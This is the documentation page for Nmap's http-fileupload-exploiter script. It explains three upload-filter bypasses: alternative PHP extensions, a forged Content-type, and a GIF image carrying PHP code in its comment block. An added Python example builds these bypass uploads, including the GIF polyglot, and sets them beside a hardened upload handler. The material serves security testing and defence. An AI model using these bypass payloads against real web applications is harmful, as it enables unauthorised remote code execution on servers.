Script http-fileupload-exploiter
Script types:
portrule
Categories:
intrusive, exploit, vuln
Download: https://svn.nmap.org/nmap/scripts/http-fileupload-exploiter.nse
Script Summary
Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
Script Arguments
- http-fileupload-exploiter.fieldvalues
The script will try to fill every field found in the upload form but that may fail due to fields' restrictions. You can manually fill those fields using this table. For example, {gender = "male", email = "foo@bar.com"}. Default: {}
- http-fileupload-exploiter.formpaths
The pages that contain the forms to exploit. For example, {/upload.php, /login.php}. Default: nil (crawler mode on)
- http-fileupload-exploiter.uploadspaths
Directories with the uploaded files. For example, {/avatars, /photos}. Default: {'/uploads', '/upload', '/file', '/files', '/downloads'}
- slaxml.debug
See the documentation for the slaxml library.
- httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost
See the documentation for the httpspider library.
- smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
- http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
See the documentation for the http library.
Example Usage
nmap -p80 --script http-fileupload-exploiter.nse <target>

This script discovers the upload form on the target's page and attempts to exploit it using 3 different methods:

1) At first, it tries to upload payloads with different insecure extensions (for example .php3 or .phtml next to .php). This will work against a weak blacklist used by a file name extension verifier: any executable extension the blacklist forgot gets through.

2) If (1) doesn't work, it will try to upload the same payloads, this time with different Content-type headers, like "image/gif" instead of "text/plain". This will trick any mechanism that checks the MIME type supplied by the client, because that header is set by the uploader and is not derived from the file content.

3) If (2) doesn't work, it will create proper GIF images that contain the payloads in the comment extension block. A check that only inspects the file's structure (magic bytes, dimensions, a successful image parse) sees a valid image, while the server-side interpreter ignores the binary bytes and executes the code embedded in the comment. This will bypass any check of the actual content of the uploaded file that does not re-encode the image.

TODO: * Use the vulns library to report.
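The three bypasses above, built as raw bytes, next to the server-side check that defeats all of them. This is an added example for this page and is not code from the http-fileupload-exploiter script; the payload, the extension list, the filter levels and the function names are assumptions made for illustration. The GIF is hand-assembled (1x1 pixel, two-entry colour table, comment extension 0x21 0xFE) so the example runs offline without an image library.

```python
"""Added example: upload-filter bypasses from the page and a hardened handler.
Not the script's own code; lists and names below are illustrative assumptions."""
import hashlib
import struct

PAYLOAD = b"<?php echo 'marker'; ?>"       # constructed test payload, never executed here
EXTS = ["php", "php3", "php4", "php5", "phtml"]  # illustrative, not the script's table

# Smallest valid GIF: 1x1 pixel, two-entry global colour table, standard LZW data.
_HEADER = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0) + b"\x00\x00\x00\xff\xff\xff"
_IMAGE = b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x44\x01\x00"
_TRAILER = b"\x3b"


def _subblocks(payload):
    """Encode bytes as GIF data sub-blocks: <=255 bytes each, 0x00 terminator."""
    out = bytearray()
    for i in range(0, len(payload), 255):
        chunk = payload[i:i + 255]
        out.append(len(chunk))
        out += chunk
    out.append(0)
    return bytes(out)


def build_gif_with_comment(payload):
    """Method 3: a structurally valid GIF whose comment extension carries the
    payload. An interpreter skips the binary and runs the <?php ... ?> block."""
    return _HEADER + b"\x21\xfe" + _subblocks(payload) + _IMAGE + _TRAILER


def candidate_uploads(payload=PAYLOAD):
    """The three escalating attempts, as (filename, content_type, body)."""
    for ext in EXTS:                       # 1: alternative executable extensions
        yield "1." + ext, "text/plain", payload
    for ext in EXTS:                       # 2: same files, forged Content-type
        yield "1." + ext, "image/gif", payload
    for ext in EXTS:                       # 3: real GIF, payload in a comment
        yield "1." + ext, "image/gif", build_gif_with_comment(payload)


def weak_accepts(filename, content_type, body, level):
    """The filter each method defeats. level 1: extension blacklist;
    level 2: adds client-supplied MIME check; level 3: adds magic-byte check."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext == "php":
        return False
    if level >= 2 and not content_type.startswith("image/"):
        return False
    if level >= 3 and not body.startswith(b"GIF8"):
        return False
    return True


def _skip_subblocks(data, i):
    """Advance past a chain of data sub-blocks starting at offset i."""
    while True:
        n = data[i]
        i += 1
        if n == 0:
            return i
        i += n


def strip_gif_comments(data):
    """Walk the GIF block structure, keep image and control blocks, drop every
    comment extension. Raises ValueError for anything not a well-formed GIF."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    i = 13
    if data[10] & 0x80:                      # global colour table present
        i += 3 * 2 ** ((data[10] & 0x07) + 1)
    out = bytearray(data[:i])
    try:
        while i < len(data):
            b = data[i]
            if b == 0x3B:                    # trailer: done
                return bytes(out + b"\x3b")
            if b == 0x21:                    # extension block
                end = _skip_subblocks(data, i + 2)
                if data[i + 1] != 0xFE:      # keep all but comment extensions
                    out += data[i:end]
            elif b == 0x2C:                  # image descriptor
                j = i + 10
                if data[i + 9] & 0x80:       # local colour table
                    j += 3 * 2 ** ((data[i + 9] & 0x07) + 1)
                end = _skip_subblocks(data, j + 1)   # +1: LZW minimum code size
                out += data[i:end]
            else:
                raise ValueError("unknown block 0x%02x" % b)
            i = end
    except IndexError:
        pass
    raise ValueError("truncated GIF")


def hardened_accept(filename, content_type, body):
    """Allowlist on the final suffix, body must parse as that type, and the image is
    re-serialised without comments. content_type is ignored: it is attacker-controlled.
    Returns (stored_name, cleaned_bytes) or raises ValueError."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "gif":
        raise ValueError("extension not allowed: %r" % ext)
    cleaned = strip_gif_comments(body)       # also rejects non-GIF bodies
    return "%s.gif" % hashlib.sha256(cleaned).hexdigest()[:16], cleaned


def hardened_rejects(filename, content_type, body):
    """True when the hardened handler refuses the upload."""
    try:
        hardened_accept(filename, content_type, body)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for level in (1, 2, 3):
        hits = [(f, ct) for f, ct, b in candidate_uploads() if weak_accepts(f, ct, b, level)]
        print("filter level %d lets through: %s" % (level, hits[:2]))
    name, cleaned = hardened_accept("1.gif", "image/gif", build_gif_with_comment(PAYLOAD))
    print("hardened stored %s, payload present: %s" % (name, PAYLOAD in cleaned))
```

Run stand-alone, the weak filter at each level admits exactly the attempt the matching method produces, while hardened_accept rejects every .php* name regardless of Content-type and strips the comment block from the one upload that is a real image. Re-encoding (here, re-serialising the block structure) is what matters: a magic-byte or dimension check alone passes the polyglot untouched.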
Script Output
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| Testing page /post.html
|
| Successfully uploaded and executed payloads:
| Filename: 1.php, MIME: text/plain
|_ Filename: 1.php3, MIME: text/plain
Requires
Author:
License: Same as Nmap--See https://nmap.org/book/man-legal.html